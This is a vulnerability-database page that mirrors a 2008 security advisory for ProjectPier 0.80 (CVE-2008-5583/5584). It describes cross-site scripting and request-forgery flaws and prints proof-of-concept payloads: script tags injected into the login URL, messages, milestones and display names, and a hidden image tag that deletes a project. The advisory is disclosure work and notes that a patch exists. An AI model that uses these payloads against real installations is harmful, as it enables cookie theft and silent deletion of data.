ProjectPier <= 0.80 Cross Site Scripting and Request Forgery

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052348 漏洞类型
发布时间 2008-12-17 更新时间 2008-12-17
CVE编号 CVE-2008-5583
CVE-2008-5584
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008120128
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
======================================================================
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
======================================================================

Author:          L4teral <l4teral [4t] gmail com>
Impact:          Cross Site Scripting
                 Cross Site Request Forgery
Status:          patch available

------------------------------
Affected software description:
------------------------------

Application:     ProjectPier
Version:         <= 0.80
Vendor:          http://www.projectpier.org

Description:
ProjectPier is a Free, Open-Source, self-hosted PHP application for
managing tasks, projects and teams through an intuitive web interface.
ProjectPier will help your organization communicate, collaborate and
get things done Its function is similar to commercial
groupware/project management products, but allows the freedom and
scalability of self-hosting. Even better, it will always be free.

--------------
Vulnerability:
--------------

1. The login page is vulnerable to cross site scripting.
2. script code can be embedded into messages.
3. script code can be embedded into milestones.
4. script code can be embedded into a users display name.
5. The application is vulnerable to cross site request forgery.
   A project e.g. can be deleted with a simple GET request (see PoC).
   Combined with the XSS vulnerabilies, the code can be embedded into
   a message - if an admin views it, the browser will send the request
   to delete a project without being visible to the admin.

------------
PoC/Exploit:
------------

1.
http://localhost/projectpier/index.php?c=access"><script>alert('xss')</s
cript>&a=login"><script>alert(document.cookie)</script>

2.
create a message with <script>alert(document.cookie)</script>

3.
create a milestone with <script>alert(document.cookie)</script>

4.
set the display name in the profile to <script>alert(document.cookie)</script>

5.
<img src="http://localhost/projectpier/index.php?c=project&a=delete&id=1&acti
ve_project=1"
width="0" height="0">

---------
Solution:
---------

update to version 0.8.0.1 or above.

---------
Timeline:
---------

2007-10-24 - vendor informed
2007-10-24 - vendor responded
2008-02-13 - vendor released new version
2008-02-17 - public disclosure